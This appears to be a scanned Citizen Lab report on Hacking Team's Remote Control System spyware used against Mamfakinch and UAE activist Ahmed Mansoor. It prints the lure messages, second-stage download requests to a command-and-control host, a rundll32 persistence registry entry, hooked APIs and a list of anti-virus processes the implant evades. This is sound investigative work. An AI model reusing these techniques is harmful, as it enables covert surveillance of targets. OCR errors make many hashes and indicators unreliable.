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INTRODUCTION 

In this report, Citizen Lab Security Researcher Morgan Marquis-Boire describes analysis performed on 
malicious software used to compromise a high profile dissident residing in the United Arab Emirates. The 
findings indicate that the software is a commercial surveillance backdoor distributed by an Italian company 
known as Hacking Team. The report also describes the potential involvement of vulnerabilities sold by the 
French company, VUPEN. 

In July of this year, Morgan Marquis-Boire and Bill Marczak published analysis of what appeared to be 
FinSpy, a commercial trojan from the FinFisher suite of surveillance tools sold by Gamma Group 
International. Their report, From Bahrain with Love: FinFisher 's Spykit Exposed? , presented evidence 
consistent with the use of FinSpy to target Bahraini dissidents, both within Bahrain and abroad. 

A range of other companies sell surveillance backdoors and vulnerabilities for what they describe as "lawful 
intercept tools." Recently CSO magazine published an article reporting on claims by anti-virus company Dr 
Web that a backdoor known as "Crisis" or "DaVinci" was, in fact, the commercial surveillance tool "Remote 
Control System" sold by Milan, Italy-based lawful intercept vendor Hacking Team. 1 According to an 
article published by Slate, the same backdoor was used to target Moroccan citizen journalist group 
Mamfakinch.- 

This report examines the targeting of Mamfakinch and evidence suggesting that the same commercial 
surveillance toolkit described in these articles appears to have also been used in a recent campaign targeting 
Ahmed Mansoor, a human rights activist based in the United Arab Emirates (UAE). Additionally, it examines 
the possibility that a vulnerability linked to the French company VUPEN was used as the vector for intrusion 
into Ahmed Mansoor's online presence. 
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The findings of this report contribute to a body of evidence of a growing commercial market for offensive 
computer network intrusion capabilities developed by companies in Western democratic countries. While the 
majority of these companies claim to sell their products to a restricted client base of law enforcement, military, 
and intelligence agencies, this report shows another example of commercial network intrusion tools being 
used against dissidents in countries with poor human rights records. 

The market for commercial computer network intrusion capabilities has become a focus of controversy and 
debate about regulatory and legal controls that might be exercised over sales to such regimes or uses of the 
technology to target dissidents. Following the publication of From Bahrain with Love: FinFisher's Spvkit 
Exposed , the UK government reaffirmed that existing controls restricting the export of cryptographic systems 
apply to the Gamma Group's exports of FinSpy. 

In general, targeted malware attacks are an increasing problem for human rights groups , who can be 
particularly vulnerable to such attacks due to limited resources or lack of security awareness. 

RECENT BACKGROUND: DA VINCI AND MAMFAKINCH.COM 

On Friday the 13th of July 2012, the Moroccan citizen media and journalism project Mamfakinch- was 
targeted by an electronic attack that used surveillance malware. Mamfakinch.com, a website that is frequently 
critical of the Moroccan government, received a message via their website directing recipients to a remote 
webpage: 



Svp ne mentionnez pas mon nom ni rien du tout je ne veux pas d embrouilles... 
http://freeme.eu5.org/scandale%20(2).doc 

The text, which hints at a sensitive scoop or lead translates roughly as "please don't mention my name and 
don't say anything at all [about me] I don't want to get mixed up in this". 
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The logs of the website reveal this message was sent from Moroccan IP space: 



41.137.57.198 - - [13/Jul/2012:20:48:44 +0100] "GET /nous-contacter/ HTTP/1.1" 200 9865 
"https://www.mamfakinch.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 
Firefox/13.0.1" 

41.137.57.198 - - [13/M/2012:20:48:46 +0100] "GET /wp-content/plugins/wp- 

cumulus/tagcloud.swf?r=8659047 HTTP/1.0" 200 34610 "https://www.mamfakinch.com/nous-contacter/" 
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1" 
41.137.57.198 - - [13/M/20 12:20:48:47 +0100] "GET/nous- 
contacter/?_wpcf7_is_ajax_call=l&_wpcf7=2782 HTTP/1.1" 200 9886 

"https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) 
Gecko/20100101 Firefox/13.0.1" 

41.137.57.198 - - [13/Jul/2012:20:50:08 +0100] "POST /nous-contacter/ HTTP/1.1" 200 139 
"https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) 
Gecko/20100101 Firefox/13.0.1" 

41.137.57.198 - - [13/Jul/2012:20:50:12 +0100] "GET /nous-contacter/ HTTP/1.1" 200 9887 
"https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) 
Gecko/20100101 Firefox/13.0.1" 

41.137.57.198 - - [13/Jul/2012:20:50:14 +0100] "GET/nous- 
contacter/?_wpcf7_is_ajax_call=l&_wpcf7=2782 HTTP/1.1" 200 9888 

"https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) 
Gecko/20100101 Firefox/13.0.1" 



The IP from which the targeting message was uploaded (41.137.57.198) is from a Moroccan range dedicated 
to mobile 3G Internet users in the capital Rabat and its surroundings: 



inetnum: 41.137.56.0 - 41.137.57.255 

netname: INWI-PDSNl-RabatOOl 

country: MA 

admin-c: AN2-AFRINIC 

tech-c: AN2-AFRINIC 



The page, found at http://freeme.eu5 .org/scandale%20(2).doc prompted the user for the installation of 
malicious java, file, "adobe.jar": 
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53cdld6alcc64d4e8275a22216492b76dbl86cfb38cec6e7b3cfb7a87ccb3524adobe.jar 



This file then facilitated the installation of a multi-platform (OSX and Windows) backdoor. 



Archive: adobe. jar 
Length Date Time Name 



253 2012-07-09 14:33 META-INF/MANIFEST.MF 

374 2012-07-09 14:33 META-INF/S IGNAPPL. SF 

888 2012-07-09 14:33 META-INF/SIGNAPPL.DSA 

0 2011-09-15 11:07 META-INF/ 

3853 2011-09-15 11:07 WebEnhancer. class 

1043456 2012-07-09 16:33 win 

993440 2012-07-09 16:33 mac 



2042264 7 files 



In the contents of the .jar you can see files called "win" and "mac" which correspond to Windows and OSX 
backdoors respectively: 



C93074c0e60d0f9d33056fd6439205610857aa3cf54clc20a48333b4367268ca win 
10fa7fa952dfc933b96d92ccd254a7655840250a787alb4d9889bf2f70153791 mac 



The Windows backdoor contains a variety of clear-text strings which are found in the SSH-client, "Putty". The 
OSX version of the backdoor, however, contains what appear to be to debug strings referencing the name of 
the developer, 'Guido': 



Users/guido/Projects/driver-macos/ 

/Users/guido/Projects/driver-macos/mchook.c 

C:/RCS/jlc3V7we.app 

C:/RCS/DB/temp 

C:/RCS/DB/temp/1341jlc3V7we.app 
C:/RCS/DB/temp$ 

Execution of the Windows backdoor writes the following files to disk: 
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C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\jlc3V7we\IZsROY7X.-MP 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\jlc3V7we\eiYNz lgd.Cfp 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\jlc3V7we\t2HBeaM5.0Uk 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\jlc3V7we\WePlxpBU.wA- 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\jlc3V7we\6EaqyFfo.zIK 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\jlc3V7weMUnsA3Ci.Bz7 



The file 'ZsROY7X.-MP' appears to provide the main backdoor functionality: 



C093b72cc249c07725ec3c2eebl842fe56c8a27358f03778bf5464ebeddbd43c ZsROY7X.-MP' 



It is executed via rundll32 and the following registry entry created to ensure persistence: 



HKU\s-l-5-21-1177238915-1336601894-725345543- 

500\software\microsoft\windows\currentversion\run\*J7PugHy C:\WINDOWS\system32\rundll32.exe 
"C:\DOCUME~l\ADMINI~l\LOCALS~l\jlc3V7we\IZsROY7X.-MP",Fldd208 

Processes such as iexexplorer.exe and wscntfy.exe are infected. Examination of loaded modules for 
"wscntfy.exe" reveals: 



C:\DOCUME~l\ADMINI~l\LOCALS~l\jlc3V7we\IZsROY7X.-MP 

C :\WINDOWS\system32\winhttp.dll 

C:\WINDOWS\system32\ws2_32.dll 

C :\WINDOWS\system32\ws2help.dll 

C:\WINDOWS\system32\ole32.dll 

C:\WINDOWS\system32\oleaut32.dll 

C:\WINDOWS\system32\imm32.dll 



The backdoor has been identified as a variant of a commercial backdoor sold by the Italian Company 
"Hacking Team". First identified by Russian Antivirus company Dr Web on July 25th, 2012, the backdoor has 
been called "Remote Control System," "Crisis" and "DaVinci". 

The Hacking Team Remote Control System (RCS) is described in a leaked copy of their promotional literature 

as: 

"A stealth, spyware-based system for attacking, infecting and monitoring computers and smartphones. Full intelligence on target 
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users even for encrypted communications (Skype, PGP, secure web mail, etc.)"~ 
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The Hacking Team public website stipulates that their technology is sold only to a restricted customer base: 

"...we provide effective, easy-to-use offensive technology to the worldwide law enforcement and intelligence communities. "~ 

UAE HUMAN RIGHTS ACTIVIST COMPROMISED 

Ahmed Mansoor is a prominent UAE blogger and one of the ' UAE Five ', a group of Emirati activists who 
were imprisoned from April to November 201 1 on charges of insulting President Khalifa bin Zayed Al 
Nahyan, Vice President Mohammed bin Rashid Al Maktoum, and Crown Prince Mohammed bin Zayed Al 
Nahyan of the United Arab Emirates. - 



On the 23rd of July, he received the following email (click image to enlarge): 



Prom: ARABIC W1KI LEAKS ■: BrabiciMkllieakssaqmalLcom* 




Date: 2013/7123 




Subject: £^i>J i^^L* 




Tc: 













This email, sent from a suggestively titled e-mail address, urges the recipient to read a 'very important 
message' and it contained the following attachment: 



Cdlfe50dbde70fb2f20d90b27a4cfe5676fa0e566a4acl4dc8dfd5c232b93933 veryimportant.doc 



The attachment is malicious. To the user it appears to be a Microsoft Word document, however it in fact is an 
RTF file containing an exploit which allows the execution of code that downloads surveillance malware. 

This document exploits a stack-based buffer overflow in the RTF format that has been previously 
characterized: 

"Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for 
Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via 
crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability. "~ 

When Ahmed Mansoor opened the document, his suspicions were aroused due to garbled text displayed. His 
email account was later accessed from the following suspicious IPs: 
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Browser United Arab Emirates (92.99.46.94) Jul 26 (19 hours ago) 
IMAP United Arab Emirates (83.1 10.5.136) Jul 26 (1 day ago) 
IMAP United Arab Emirates (83.110.5.136) Jul 25 (2 days ago) 
IMAP United Arab Emirates (83.1 10.5.136) Jul 24 (3 days ago) 
IMAP United Arab Emirates (83.110.5.46) 6:54 am (3 hours ago) 



ANALYSIS OF "VERYIMPORTANT.DOC" 

The file "veryimportant.doc" is a downloader that downloads the second stage of the malware via HTTP: 



GET /0000000031/veryimportant.doc2 HTTP/1.1 
Host: ar-24.com 



Examination of the sample displays use of the windows API to download the 2nd stage: 
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The 2nd stage is called "veryimportant.doc2": 



b5462a2be69d268a7d58 1 fe9ee36e8f3 1 d5e 1 362d0 1 626e275e8f58029e 15683 veryimportant.doc2 
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This is also a downloader that downloads the 3rd stage which appears to be the actual backdoor: 
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The executable code is downloaded from: http://ar-24.com/0000000031/veryimportant.doc3 



277cae7c249cb22ae43a605fbe901a0dc03f 1 Ie006b02d53426a6dl Iad241a74 veryimportant.doc3 



Similar in behavior and appearance to the windows version of the RCS backdoor which targeted Mamfakinch, 
'veryimportant.doc3' contains a variety of clear-text strings which are found in the SSH-client, "Putty". On 
execution, "veryimportant.doc3" writes the following files to disk: 



C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\UbY5xEcD\dXRhzmn8.nmN 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\UbY5xEcD\V461MhsH.shv 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\UbY5xEcD\uVvJfjYa.YjG 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\UbY5xEcD\mOCRIsaV.as_ 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


l\UbY5xEcD\iZ90AoPk.Pos 


C:\DOCUME~ 


1\ADMINI~ 


l\LOCALS~ 


!\UbY5xEcD\0j-GU9H4.H9C 



The following command is run, executing the file: "V461MhsH.shv" 
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C:\WINDOWS\System32\rundll32.exe 

"C:\DOCUME~ l\ADMINI~l\LOCALS~l\UbY5xEcD\V461MhsH.shv",F7ed728 



This then infects the following processes: 



explorer.exe 

iexplore.exe 

wscntfy.exe 

reader_sl.exe 

VMwareUser.exe 



For example if we examine the process 'wscntfy.exe" the following modules are loaded: 



C:\DOCUME~l\ADMINI~l\LOCALS~l\UbY5xEcDW461MhsH.shv 10000000 aOOOO 
C:\WINDOWS\system32\winhttp.dll 4d4f0000 59000 
C:\WINDOWS\system32\ws2_32.dll 71ab0000 17000 
C:\WINDOWS\system32\ws2help.dll 71aa0000 8000 
C:\WINDOWS\system32\ole32.dll 774e0000 13d000 
C:\WINDOWS\system32\oleaut32.dll 77120000 8b000 
C:\WINDOWS\system32\imm32.dll 76390000 IdOOO 
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Examination of this process in the memory of an infected machine reveals the following functions are hooked 
by the malware: 



Function: ntdll.dll INtDeviceloControlFile at 0x7c90d27e 
Function: ntdll.dll INtEnumerateValueKey at 0x7c90d2ee 
Function: ntdll.dll INtQueryDirectoryFile at0x7c90d76e 
Function: ntdll.dll INtQueryKey at0x7c90d85e 
Function: ntdll.dll INtQuerySystemlnformation at 0x7c90d92e 
Function: ntdll.dll IRtlGetNativeSystemlnformation at0x7c90d92e 
Function: ntdll.dll IZwDeviceloControlFile at 0x7c90d27e 
Function: ntdll.dll IZwEnumerateValueKey at0x7c90d2ee 
Function: ntdll.dll IZwQueryDirectoryFile at0x7c90d76e 
Function: ntdll.dll IZwQuery Key at0x7c90d85e 
Function: ntdll.dlllZwQuerySystemlnformation at 0x7c90d92e 
Function: kernel32.dll ICreateFileW at 0x7c8 10800 
Function: kernel32.dll ICreateProcess A at 0x7c80236b 
Function: kernel32.dll ICreateProcessW at 0x7c802336 
Function: kernel32.dll IDeleteFileW at 0x7c831f63 
Function: kernel32.dll IMoveFileW at 0x7c821261 
Function: kernel32.dll IReadConsoleA at0x7c872b5d 
Function: kernel32.dll IReadConsolelnputA at 0x7c874613 
Function: kernel32.dll IReadConsolelnputExA at 0x7c874659 
Function: kernel32.dll IReadConsolelnputExW at 0x7c87467d 
Function: kernel32.dll IReadConsolelnputW at 0x7c874636 
Function: kernel32.dll IReadConsoleW at 0x7c872bac 
Function: USER32.dll!CreateWindowExA at0x7e42e4a9 
Function: USER32.dll ICreateWindowExW at 0x7e42d0a3 
Function: USER32.dll!GetMessageA at 0x7e42772b 
Function: USER32.dll!GetMessageW at 0x7e4191c6 
Function: USER32.dll!PeekMessageA at 0x7e42a340 
Function: USER32.dll!PeekMessageW at 0x7e41929b 
Function: GDI32.dll ICreateDC A at0x77flb7d2 
Function: GDI32.dll ICreateDCW at 0x77flbe38 
Function: GDI32.dll!DeleteDC at0x77fl6e5f 
Function: GDI32.dll !EndDoc at0x77f2defl 
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Function: GDI32.dll !EndPage at 0x77f2dc61 

Function: GDI32.dll!GetDeviceCaps at0x77fl5a71 

Function: GDI32.dll! Set AbortProc at 0x77f44df2 

Function: GDI32.dll IStartDoc A at 0x77f45e79 

Function: GDI32.dll IStartDoc W at 0x77f45962 

Function: GDI32.dll!StartPage at 0x77f2f49e 

Function: ADVAPI32.dll!CreateProcessAsUserA at0x77el0ce8 

Function: ADVAPI32.dll!CreateProcessAsUserW at 0x77dea8a9 

Function: imm32.dll HmmGetCompositionStringW at 0x7639548a 



We can see the malware infecting the process "wscntfy.exe", visible in the memory region of the process 
which is marked as executable and writeable: 
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Process: wscntfy.exe Pid: 1948 Address: 0xe70000 
Vad Tag: VadS Protection: PAGE EXECUTE REAOWRITE 

Flags: CommitCharge: 1, Hemcorwnit: 1, PrivateMemory : 1, Protection: 6 

OxGOe7OOO0 55 8b ec 81 ec lc 02 90 00 53 56 57 eb 00 eb 00 U SVW 

0xoee7eoie 33 ce 89 45 fc bb 00 eo e8 00 89 5d fc 89 45 f8 3..E ]..E, 

0xQ9e70020 8b 5d fc 36 8d 75 08 bf 01 00 00 00 cl e7 02 2b .].6.u + 

OxO0e70O3O e7 8b fc b9 01 00 00 00 f3 a5 ff d3 89 45 f8 8b E. . 



0xe7OO00 55 
0xe7000l 8bec 
0xe70003 81eclc020O00 
0xe7OO09 53 
oxe7OO0a 56 
0xe7OO0b 57 
0xe7000c ebOO 
0xe7O00e eboo 
0xe7O010 33c0 
0xe70012 8945fc 
0xe7OOi5 bbO00Oe80O 
0xe70Ola 895dfc 
9xe7001d 8945f8 
0xe7O020 8b5dfc 
0xe70023 368d7508 
0xe70027 bfoioooooo 
0xe7002c cle702 
0xe7002f 2be7 
0xe70031 8bfC 
0xe70033 b9O10O000O 
0xe70038 f3a5 
0xe7OO3a ffd3 
0xe7003c 8945f8 
0xe7003f 8b 



PUSH EBP 
MOV EBP, ESP 
SUB ESP, 0x21c 
PUSH EBX 
PUSH ESI 
PUSH EDI 
JMP 0xe7000e 
jhp oxe700io 
XOR EAX, EAX 
MOV [E8P-0X4], EAX 
MOV EBX, Oxe800O0 
MOV [EBP -0x4], EBX 
MOV [EBP -0x8] , EAX 
MOV EBX, [EBP-0X4] 
LEA ESI, [EBP+Oxaj 
MOV EDI, 0X1 
SHL EDI, 0x2 
SUB ESP, EDI 
MOV EDI, ESP 
MOV ECX, 0x1 
REP MOVSD 
CALL EBX 

MOV [EBP -0x8] , EAX 
DB 0X80 
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Here we see inline hooking of "NtQuerySystemlnformation" performed by the malware, a technique 
frequently used to allow process hiding: 



ook mode: Usermode 


it********************************************* 


00k type: Inline/Trampoline 


rocess: 1948 (wscntfy.exe) 


ictim module: ntdll.dll 


(0X7C90O000 - 0x7c9b2000) 


unction: ntdll.dll ! NtQuerySystemlnformation at 0x7c90d92e 


ook address: 0xd9O000 




ooking module: <unknown> 




isassembly(0) : 




X7c90d92e e9cd264884 


JMP 0xd90000 


X7c90d933 ba0003fe7f 


MOV EDX, 0x7ffe0300 


X7c90d938 ffl2 


CALL DWORD [EDX] 


X7c90d93a C21000 


RET 0x10 


X7c90d93d 90 


NOP 


X7c90d93e b8ae0G0O00 


MOV EAX, Oxae 


x7c90d943 ba 


DB 0xba 


X7c90d944 0003 


ADD [EBX] , AL 


isassembly(l) : 




xd90000 55 


PUSH EBP 


xd90001 8bec 


MOV EBP, ESP 


xd90003 83ec0c 


SUB ESP, 0XC 


xd90006 53 


PUSH EBX 


xd90007 56 


PUSH ESI 


xd90008 57 


PUSH EDI 


xd90009 ebG0 


JMP 0xd90O0b 


xd9000b eb00 


JMP 0xd9000d 


xd9000d 33c0 


XOR EAX, EAX 


xd9000f 8945f4 


MOV [EBP-Oxc], EAX 


Xd90012 8945f8 


MOV [EBP -0x8], EAX 


xd90015 bb 


DB 0xbb 


xd90016 0000 


ADD [EAX], AL 





A registry key is added which ensures the persistence of the backdoor after reboot: 



HKU\s-l-5-21-1177238915-1336601894-725345543- 

500\software\microsoft\windows\currentversion\run\*Ulo4r7M C:\WINDOWS\system32\rundll32.exe 
"C:\DOCUME~l\ADMINI~l\LOCALS~l\Ub Y5xEcD\V461MhsH.shv",F7ed728 REG_EXPAND_SZ 0 
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The file "V461MhsH.shv" appears to perform the main backdoor functionality: 



ldf lbdl 1 154224bcf015db8980a3c490bl584f49d4a34ddel9cl9bc0662ebda2 V461MhsH.shv 



Further investigation of the implant reveals strings relating to popular anti-rootkit and anti-virus software, 
suggesting evasion of specific products: 



fsm32.exe 

pcts*.exe 

rootkitbuster.exe 

k7*.exe 

avk.exe 

admin.exe 

avp.exe 

bgscan.exe 

pavark.exe 

rku*.exe 

svv.exe 

IceSword.exe 

gmer.exe 

avgscanx.exe 

RootkitRevealer. exe 

avscan.exe 

avgarkt.exe 

sargui.exe 

fsbl.exe 

blbeta.exe 

Unhackme.exe 

hiddenfinder.exe 

hackmon.exe 

TaskMan.exe 

KProcCheck.exe 
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We can also see the targeting of popular browsers: 

chrome.exe 
iexplore.exe 
firefox.exe 
opera.exe 

And popular messaging clients: 



yahoomessenger.exe 

msnmsgr.exe 

skype.exe 

winmm.DLL 

googletalk.exe 

Googletalk.exe 

YahooMessenger.exe 



The Windows implant includes a signed AMD64 driver. The certificate was issued by Verisign to "OPM 
Security Corporation". 



CommonName: 


OPM Security Corporation 


Status: 


Valid 


Validity (GMT): 


Mar 28, 2012 - Mar 28, 2015 


Class: 


Digital ID Class 3 - Software Validation 


Organization: 


OPM Security Corporation 


Organizational Unit: 


Digital ID Class 3 - Microsoft Software Validation v2 Applications 


State: 


Panama 


City/Location: 


Panama 


Country: 


PA 


Serial Number: 


21f33716e4db06fcf8641e0287ele657 


Issuer Digest: 


4bc6f9bl06c333db6c6a5b28e6738f7e 
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OPM security appears to be a Panama based company:- 

Calle 50 Edificio Credicorpbank, Office 604 
Panama 

Republic of Panama 
Telephone +507-832-7893 

From their web site: - 

"From Panama to the World, OPM Security Corporation provides personal and institutional security tools and anonymity to you 
and your business. " 

OPM Security is an OPM Corporation company.— On their website, http : //taxhaven .u s , OPM Corporation 
states: 

"O.P.M. CORPORATION, has been one of the leading providers of Offshore services since 1992 (check 266794). Through our 
headquarters in Panama, our Caporaso & Partners Law Office (check 25210 ) and correspondent offices in South America and 
Caribbean, we offer the best offshore packages. " 

COMMAND AND CONTROL 

This malware calls back to the command and control domain: ar-24.com 
This domain is registered through GoDaddy: 

Domain Name: AR-24.COM 
Registrar: GODADDY.COM, LLC 
Whois Server: whois.godaddy.com 
Referral URL: http://registrar.godaddy.com 



As of October 1st, 2012 this domain appears to be pointing to a Linode 11 instance: 



ar-24.com has address 50.116.38.37 
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During August 2012, for a short period, this domain resolved to 83.111.56.188: 



inetnum: 83.111.56.184 - 83.111.56.191 
netname: minaoffice-EMIRNET 
descr: Office Of Sh. Tahnoon Bin Zayed Al Nahyan 
descr: P.O. Box 5151 , Abu Dhabi, UAE 
country: AE 



The physical address in the domain record (P.O. Box 5151, Abu Dhabi, UAE) matches the address for the 
corporate headquarters of Royal Group, which is a conglomerate of companies based in the UAE. 

IDENTIFICATION 

This malware contains the following strings: 

S OFTW AREVMicro s oftYWindo w s\CurrentVer sion\App Paths\vmplayer. exe 

vixDiskMountServer.exe 

[Inf. Module]: Spread to VMWare %S 

- VMWare Installation OK 

.vmdk" 
.vmx" 

WMware\preferences.ini 



Rim.Desktop.exe 



[Inf. Module] : Spread to Mobile Device 
- WM SmartPhone Installation.. ..OK 



[Inf. Module]: Spread to USB Drive 
- USB Drive Installation OK 
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The strings describing the Virtual Machine infection are the same as those described in the Symantec report on 
the Moroccan malware . 

In addition to the similarities between the sample that Symantec and Dr. Web identified as being written by 
Hacking Team, "veryimportant.doc" is very structurally similar to this sample found on Virus Total . 

This sample uses the following domain for command and control: rcs-demo.hackingteam.it 



8 1 e9647a337 1 568cddd0a4db597de8423 179773d9 1 0d9a7b3d945cb2c3b7e 1 c2 



Remote Control System can monitor and log any action performed by means of a personal computer: 

Web Browsing 

Opened/Closed/Deleted Files 

Keystrokes (any UNICODE language) 

Printed Documents 

Chat, email, instant messaging 

Remote Audio Spy 

Camera Snapshots 

Skype Conversations 



This information indicates that the sample matching "veryimportant.doc" may be a demo copy of the Hacking 

1 2 

Team RCS backdoor. Promotional materials for this backdoor advertise the following features:— 

The same promotional document mentions "Zero-day exploits" as a possible remote infection vector. 

An additional sample with structural similarities to the 1st and 2nd stages was discovered in Virus Total . 

This sample uses an exploit that has similarities in shellcode with "veryimportant.doc" however, the exploit it 
uses is newer, the Adobe Flash Player "Matrix3D" Integer Overflow.— Searching for the origin of this exploit 
revealed a public mailing list post taking credit for discovery of this bug stating: "This vulnerability was 
discovered by Nicolas Joly of VUPEN Security". 

VUPEN are a French Security company who provide a variety of services including the sale of: 
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"...extremely sophisticated and government grade exploits specifically designed for offensive missions. " 

They claim to have discovered the vulnerability in January of this year at which point they shared this with 
their customers, prior to public disclosure in August: 
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2012-01-25 - Vulnerability Discovered by VUPEN and shared with customers 
2012-08-21 - Public disclosure 

The sample appears to have been created in May of 2012 prior to public disclosure: 

Created = 2012-05- 15T10:39:00Z 
Last Saved by = "1785429" 
Generator = "Microsoft Office Word" 
Last Modified = 2012-05-15T10:39:00Z 

While VUPEN take public credit for the discovery of this bug, it is possible that the exploit used here was not 
written by VUPEN but was independently discovered and weaponized by another party. 

RECOMMENDATIONS 

The use of social engineering and commercial surveillance software attacks against activists and dissidents is 
becoming more commonplace. 

For at risk communities, gaining awareness of targeted threats and exercising good security practices when 
using email, Skype, or any other communication mechanism are essential. Users should be vigilant concerning 
all e-mails, attached web links, and files. In particular, carefully assess the authenticity of any such materials 
referencing sensitive subject matter, activities, or containing misspellings or unusual diction. If you believe 
that you are being targeted be especially cautious when downloading files over the Internet, even from links 
that are purportedly sent by friends. 

For further tips on detecting potential malware attacks and preventing compromise, see Citizen 
Lab's recommendations for defending against targeted attacks. 
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FOOTNOTES 

I http://hackingteam.it/ 
https://www.mamfakinch.com/ 

" https://www.mamfakinch.com/ 

4 http://wikileaks.Org/spyfiles/files/0/3 l_200810-ISS-PRG-HACKINGTEAM.pdf 

5 http://hackingteam.it/index.php/about-us 

6 http s : //en . wikipedia.org/wiki/UAE_Five 

7 http://www.cve. mitre. org/cgi-bin/cvename.cgi?name=CVE-20 10-3333 

8 http://www.opmsecurity.com/security-tools/who-we-are.html 

9 http://www.opmsecurity.com/ 

10 http://taxhavens.us/ 

II https://www.linode.com/ - A company which provides virtual server hosting. 

12 http://wikileaks.Org/spyfiles/files/0/3 1_2008 10-ISS-PRG-HACKINGTEAM.pdf 

13 http://www.securityfocus.eom/archive/l/524143/30/60/threaded 

14 http://www.vupen.com/english/ 
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